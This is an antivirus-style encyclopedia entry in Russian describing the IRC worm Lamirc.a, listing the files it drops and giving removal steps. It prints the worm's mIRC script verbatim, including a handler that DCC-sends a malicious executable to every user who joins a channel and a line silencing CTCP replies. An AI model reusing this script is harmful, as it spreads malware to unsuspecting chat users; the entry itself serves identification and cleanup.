IRC-Worm.Win32.Lamirc.a
Материал из Total Malware Info
IRC-Worm.Win32.Lamirc.a Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 163 892 байт.
Инсталляция
Копирует свой исполняемый файл как:
c:\iaatpb.exe
Деструктивная активность
Создает или изменяет файл:
c:\mirc\script.ini
и записывает в него следующие строки:
[script]
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick c:/GOLD.exe
n2=}
n3=ON 1:CONNECT:/join #virus | /timer5 1 2 /msg #virus pop | /timer4 1 5 /part #virus
Данный скрипт для программы mIRC рассылает файл c:\gold.exe всем присоединяющимся к каналу пользователям используя сервис DCC.
Создает или изменяет файл:
c:\mirc\remote.ini
и записывает в него следующие строки:
[remote] n0=ctcp ^1:*:?:$1- | halt
Создает файл:
С:\WINDOWS\winbakup.bat
и записывает в него следующие строки:
@cls @echo It's all about the Pentiums! @echo ------------------------------ @echo My digital media is write-protected. @echo Every file inspected, no viruses detected. @echo I beta tested every operating system. @echo Gave props to some, and others? I dissed 'em. @echo While your computer's crashin', mine's multitaskin'.. @echo It does all my work without me even askin'. @echo ------------------------------ @echo Retro :: http://retro.host.sk
Создает файл:
c:\windows\STARTM~1\programs\startup\iaatpb.vbs
и записывает в него следующие строки:
msgbox " It's all about the Pentiums, Baby! "
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- При помощи ("Диспетчера задач") завершить процесс червя.
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить файлы:
c:\iaatpb.exe c:\mirc\script.ini c:\mirc\remote.ini С:\WINDOWS\winbakup.bat c:\windows\STARTM~1\programs\startup\iaatpb.vbs
